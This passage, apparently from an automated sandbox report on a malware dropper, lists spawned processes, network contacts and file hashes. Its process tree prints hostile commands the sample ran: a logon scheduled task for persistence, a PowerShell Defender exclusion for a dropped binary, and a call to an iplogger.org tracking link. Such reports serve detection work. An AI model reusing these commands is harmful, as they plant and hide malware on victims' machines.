PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2576 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
PID 1948 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
PID 1948 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
PID 1948 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
PID 2912 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe
PID 2912 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe
PID 2912 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe
PID 2912 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c caa4baaf544.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 621c13b77.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe

24ebc9ce784c63.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe

621c13b77.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe

c0f099be1ace2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe

caa4baaf544.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe

6f1aa71747b4a291.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe

3d1f9c2a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe

09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe

e4f0738cc5646a38.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe

d55cc0d45c3a05.exe

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe

"C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe" -a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 272

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487157 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 964

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSBA69.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2376 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 s.lletlee.com udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.4.15:443 api.db-ip.com tcp
N/A 127.0.0.1:49291 tcp
N/A 127.0.0.1:49293 tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 lenak513.tumblr.com udp
US 74.114.154.18:443 lenak513.tumblr.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 music-sec.xyz udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 184.50.113.144:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
DE 72.246.29.11:80 www.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
GB 142.250.178.3:80 c.pki.goog tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe

MD5 68a59b521798b22a72d30dd7ff6eb04a
SHA1 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da
SHA256 e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc
SHA512 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546

memory/2576-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS406F7727\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS406F7727\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2576-31-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS406F7727\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2576-28-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS406F7727\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS406F7727\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe

MD5 80cf471e52dcc848d81092439489f12f
SHA1 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5
SHA256 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f
SHA512 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe

MD5 3f9f7dfccefb41726d6b99e434155467
SHA1 f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1
SHA256 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34
SHA512 e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762

memory/2576-48-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2576-47-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2576-46-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-45-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-44-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-43-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-42-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2576-41-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2576-40-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/776-90-0x0000000001150000-0x000000000117C000-memory.dmp

memory/1696-89-0x0000000000870000-0x0000000000878000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe

MD5 079d742f6fc3fcc2eca352a1537e5103
SHA1 d904d7432a367ad078c99c281b67705e7332496a
SHA256 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39
SHA512 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b

C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

memory/776-127-0x0000000000240000-0x0000000000246000-memory.dmp

memory/776-128-0x0000000000500000-0x0000000000520000-memory.dmp

memory/776-129-0x0000000000250000-0x0000000000256000-memory.dmp

memory/2884-130-0x0000000000860000-0x000000000094E000-memory.dmp

memory/2992-131-0x00000000012E0000-0x0000000001422000-memory.dmp

memory/2144-137-0x000000013FF50000-0x000000013FF60000-memory.dmp

memory/868-140-0x0000000000740000-0x0000000000824000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/1972-151-0x00000000004D0000-0x00000000005B4000-memory.dmp

memory/2992-164-0x0000000000520000-0x0000000000532000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab18B1.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar18C3.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2776-211-0x0000000000400000-0x0000000003346000-memory.dmp

memory/2576-217-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-216-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2576-215-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2576-214-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2576-213-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2576-212-0x0000000000400000-0x0000000000A07000-memory.dmp

memory/572-218-0x0000000000400000-0x00000000032F3000-memory.dmp

memory/2576-226-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2576-224-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2576-221-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2576-220-0x0000000000400000-0x0000000000A07000-memory.dmp

memory/2576-228-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2576-227-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2144-229-0x0000000000150000-0x000000000015E000-memory.dmp

C:\Users\Admin\AppData\Roaming\services64.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/2588-233-0x000000013FCA0000-0x000000013FCB0000-memory.dmp

memory/2992-234-0x000000000A950000-0x000000000A9DC000-memory.dmp

memory/2992-235-0x00000000009F0000-0x0000000000A0E000-memory.dmp

memory/868-245-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/868-242-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-240-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-238-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-236-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-247-0x0000000000400000-0x000000000041E000-memory.dmp

memory/868-246-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSBA69.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3e7329584175cbc758e7e3abc47bfd76
SHA1 2a5cff072407f0686539066dc8f3d4047f81c45a
SHA256 9384e1553e95a1fac60889b7de3ba45c8f73b7a69e89b649550ad817106185d2
SHA512 9d8ced048858a9b74a7a945c50281867c116c43a3437b51168bf61660ab448001f30275dc800741892c6447651da54a4ccb4f7967330df930f2c0962dc62030f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 434577d3d07c08cd087ab920d81f4071
SHA1 de405aa83c5b09a2516c137e73931d70dc6b36db
SHA256 5cbc2e66ae51d37f8b60038d286fae0f2a256ee3a258569298e2da582a51fb9c
SHA512 fd45225ff66a8da2ad9769c930593eed034817ad119c0a261148caee2c49cdae78eb604b9f6ea0c2caeadebde723348347146785c4084ef1c8f9c521d20b2b10

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 836313218eaf8d2ce9f0c06496b6da89
SHA1 38ff7f78fe08c344f23b5a814965f1af87bdf09e
